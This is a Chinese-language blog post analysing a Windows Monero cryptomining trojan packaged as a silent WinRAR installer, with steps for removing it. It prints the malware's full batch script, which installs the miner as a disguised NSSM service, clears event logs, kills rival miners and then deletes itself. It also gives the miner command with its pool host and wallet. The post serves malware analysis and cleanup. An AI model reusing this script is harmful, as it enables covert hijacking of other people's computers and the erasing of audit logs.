MS016小組(原創)
上一篇文章 簡單講了一下挖礦木馬 大概流程 文章地址:
https://www.cnblogs.com/ms016/articles/7978880.html
今天講分析一個挖礦木馬了解ta的原理 和查殺方式 講的是Windows挖礦木馬 也是 門羅幣 對比其ta挖礦木馬 也許替換挖礦程序 就可以了 所以基本其ta挖礦
基本都相同 先看挖礦木馬吧
其實看圖標就像一個解壓包 就是winrar 下的 弄成靜默安裝 我們用winrar 打開看看
右邊的信息 代表 靜默包完成什么操作
Path 運行靜默包 會把里面的程序釋放到 path 信息上的路徑
路徑 C:\Windows\daozai
Setup 運行 path路徑 里面的程序
運行路徑下的 run.bat 處理文件C:\Windows\daozai\run.bat
后面基本都是設置成不需要提示直接運行靜默包
然后解壓文件分析這幾個文件做什么的
Run.bat 是啟動批處理
Run64.bat 運行錢包程序的 批處理
Svchost.exe 是NSSM一款守護進程的軟件
Win1ogin.exe 是挖礦程序
了解這些文件的區別就逐個分析
先看看run.bat批處理
echo Havefun C:\Windows\daozai\svchost.exe install "Windows32_Update" "C:\Windows\daozai\run64.bat" C:\Windows\daozai\svchost.exe start Windows32_Update wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" echo Havefun @sc delete Systemss @sc delete Service @sc delete TeamServers @sc delete WMIserver @sc delete WMIservers @sc delete WMI @sc delete Serv @sc delete system_update @sc delete system_updatea @sc config wuauserv start= delayed-auto @echo off for %%a in ( spoolsvs.exe taskhost.exe NsCpuapl.exe MSASCui.exe nheqminer_zcash.exe nssm.exe update.exe server.exe sppscv.exe taskhost.exe acnom.exe acnon.exe control.exe install.exe kill.exe ntuhost.exe Terms.EXE winhost.exe netcore.exe Service.exe cpuminer-aes-sse42.exe Network.exe TeamServers.exe ) do taskkill /f /im %%a @echo off cacls c:\windows\Fones\Service.exe /e /d everyone cacls c:\windows\d11cache\TeamServers.exe e /d everyone cacls C\Windows\d11cache\Network.exe e /d everyone cacls c:\windows\d11cache\cpuminer-aes-sse42.exe e /d everyone cacls C:\Windows\netcore.exe e /d everyone cacls C:\Windows\winhost.exe e /d everyone cacls C:\Windows\Terms.EXE e /d everyone cacls c:\windows\ntuhost.exe e /d everyone cacls c:\windows\d11cache /e /d everyone cacls C\SysData /e /d everyone ping -n 5 127.0.0.1 taskkill /im mscorsvw.exe /f taskkill /im WUDFHost.exe /f taskkill /im nheqminer.exe /f taskkill /im NsCpuCNMiner64.exe /f taskkill /im NsCpuCNMiner.exe /f taskkill /f /im mssecsvc.exe /f taskkill /f /im taskhost.exe /f taskkill /f /im sppscv.exe /f del %sfxcmd% del %0 exit
前面是調用NSSM軟件守護挖礦程序
然后啟動錢包批處理
NSSM 開始守護
清除系統日志 關閉一些服務 在清理進程
里面有些進程可能 是別的挖礦大牛常用的 是為了 方便清理別人的進程
在看Run64.exe批處理
win1ogin.exe -a cryptonight -o stratum+tcp://mine.ppxxmr.com:5555 -u 42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo+update -p 123
礦池 mine.ppxxmr.com
錢包42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo
-p 123 參數 cpu 應該是跑3個核心
然后開始調用挖礦程序
講完挖礦靜默包的運行流程
如果種了挖礦程序怎么查殺
我點擊運行Update.exe 靜默包
點擊運行這個靜默包 本身會自身刪除的 所以基本不會保留
運行完挖礦靜默包 計算機的任務管理器不見了
Cmd命令 打開任務管理器打不開
友情提示: 有些挖礦 會欺騙用戶 比如電腦運行緩慢 打開任務管理器
任務管理器上的cpu顯示正常 關閉任務管理器 電腦又卡了
所以還是用第三方的一些管理工具查看比較好
cpu 百分之百了
挖礦程序占用最高 權限是system system是看不到的 不再administrator同一桌面
NSSM是守護進程 先把守護進程結束掉在結束掉挖礦程序
NSSM會自啟動挖礦程序
NSSM會把挖礦程序寫入自啟動 服務里面 所以必須把這個服務停用或卸載掉
NSSM里面有卸載命令
nssm remove <servicename> confirm
卸載命令
就刪除了服務
最后清理目錄下的挖礦程序
黑客利用NSSM這個軟件 也是方便免殺 因為這種軟件 一般都不會被添加到病毒庫里面
友情提示:
國外的安全廠商為了 封殺算力 大的挖礦僵屍網絡 會聯系礦池 管理員要求 停止支付黑客錢包 來打擊黑客
@感謝刀仔提供技術支持